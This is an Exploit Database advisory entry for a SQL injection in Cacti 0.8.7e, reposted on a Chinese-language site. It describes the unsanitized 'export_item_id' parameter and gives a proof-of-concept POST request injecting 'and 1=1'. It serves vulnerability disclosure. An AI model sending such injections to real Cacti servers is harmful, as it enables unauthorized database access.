Cacti 0.8.7e – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Nahuel Grisolia
  日期： 2010-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12338/

• CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
  A Vulnerability has been discovered in Cacti, which can be exploited by any
  user to conduct SQL Injection attacks.
  Input passed via the “export_item_id” parameter to “templates_export.php”
  script is not properly sanitized before being used in a SQL query.
  This can be exploited to manipulate SQL queries by injecting arbitrary SQL
  code.
  The following is a Proof of Concept POST request:
  POST /cacti-0.8.7e/templates_export.php HTTP/1.1
  Host: 192.168.1.107
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Proxy-Connection: keep-alive
  Referer: http://192.168.1.107/cacti-0.8.7e/templates_export.php
  Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 130
  export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
  
  ===========================================================================
  Download:
  ===========================================================================
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf)
  
  
  <Bonsai Information Security Advisories>
  http://www.bonsai-sec.com/en/research/vulnerability.php